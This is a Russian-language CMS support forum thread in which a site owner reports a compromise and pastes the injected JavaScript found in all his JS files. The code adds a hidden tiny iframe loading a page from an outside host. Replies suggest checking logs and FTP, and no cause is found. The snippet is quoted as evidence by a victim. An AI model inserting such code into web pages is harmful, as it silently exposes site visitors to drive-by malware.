Взломали сайт

Nushaba · 2012-12-24 14:43:09

Всем привет. Столкнулся с проблемой, был взломан сайт 19.11.2012
Были модифицированы все js файлы путём добавления кода следующего содержания:

/*0fead1*/
(function()
{
 var a = document.createElement('iframe');
 a.src = 'http://www.real.dp.ua/img/upload/item/207/stats.php';
 a.style.position = 'absolute';
 a.style.border = '0';
 a.style.height = '2px';
 a.style.width = '2px';
 a.style.left = '1px';
 a.style.top = '1px';
 if(!document.getElementById('mira'))
 {
 document.write('<div id=\'mira\'></div>');
 document.getElementById('mira').appendChild(a);
 }
})();
/*/0fead1*/

Не могу понять как такое произошло. Я бы мог погрешить на то, что спалил пароль от хостинга, но тогда было бы логично что заразили бы все поддомены мои тестовые, а заразили только один, значит не спалили пароль. Взломали только тот поддомен, где стояла ngcms 0.9.3 + SVN [SVN1047+] Ещё более нелогичным можно посчитать тот факт, что взломали выключенный к показу посетителям сайт, то есть из админки я выключил его, правда не помню когда, до взлома или уже после... Как это можно проверить?

Напрашивается вывод что есть какая то уязвимость в самом движке. Встречался кто с подобной проблемой и как лечить? Сайт: o.nushaba.ru

easmik · 2012-12-24 15:17:10

Nushaba, судя по коду что тут стоит эти хакеры ломанули 9620 сайтов на НГ столько нету

Nushaba · 2012-12-24 15:50:10

easmik, очевидно ломали скриптом, или каким то софтом который автоматизировал процесс, иначе зачем ещё ломать сайт который выключен. Но всё же остаются вопросы, почему взломали именно сайт с ngcms внутри а не все остальные на хостинге, ну или вопрос как это сделали, тогда будет понятно что то. В общем думаю есть дыра в движке, так как аналогичный взлом был около года назад, тогда я не стал писать.

infinity237 · 2012-12-24 17:45:57

Логи то смотрели?

https://www.google.ru/search?client=ope … el=suggest

Отредактировано infinity237 (2012-12-24 17:57:02)

dampel · 2012-12-25 00:46:25

Смотрите аксесс логи в то время, когда примерно вас взломали.
ftp используете?

Отредактировано dampel (2012-12-25 00:47:39)

Nushaba · 2012-12-25 07:48:54

Таких старых логов нету, FTP использую. Но FTP поставляет хостер. Скорее всего не FTP взломали, я уже писал что остальные сайты на том же FTP не тронули.

Отредактировано Nushaba (2012-12-25 07:58:28)

infinity237 · 2012-12-25 09:27:55

Ну и как ты теперь хочешь чтобы мы тебе сказали где бага? :D

Nushaba · 2012-12-25 10:33:46

infinity237, вдруг телепаты существуют! ) Ладно, тогда закрываем тему.

Albert · 2013-10-02 17:01:03

здравствуйте я потерял пароль для входа на сайт помогите как войти на сайт? Но мне пофиг на ngcms и я не когда не поставлю ссылку на эту CMS.

vip · 2013-10-02 17:24:46

Albert, http://ngcms.ru/forum/viewtopic.php?pid=35992#p35992

Next Generation CMS :: Форум поддержки

Объявление

#1 2012-12-24 14:43:09

Взломали сайт

#2 2012-12-24 15:17:10

Re: Взломали сайт

#3 2012-12-24 15:50:10

Re: Взломали сайт

#4 2012-12-24 17:45:57

Re: Взломали сайт

#5 2012-12-25 00:46:25

Re: Взломали сайт

#6 2012-12-25 07:48:54

Re: Взломали сайт

#7 2012-12-25 09:27:55

Re: Взломали сайт

#8 2012-12-25 10:33:46

Re: Взломали сайт

#9 2013-10-02 17:01:03

Re: Взломали сайт

#10 2013-10-02 17:24:46

Re: Взломали сайт

Подвал форума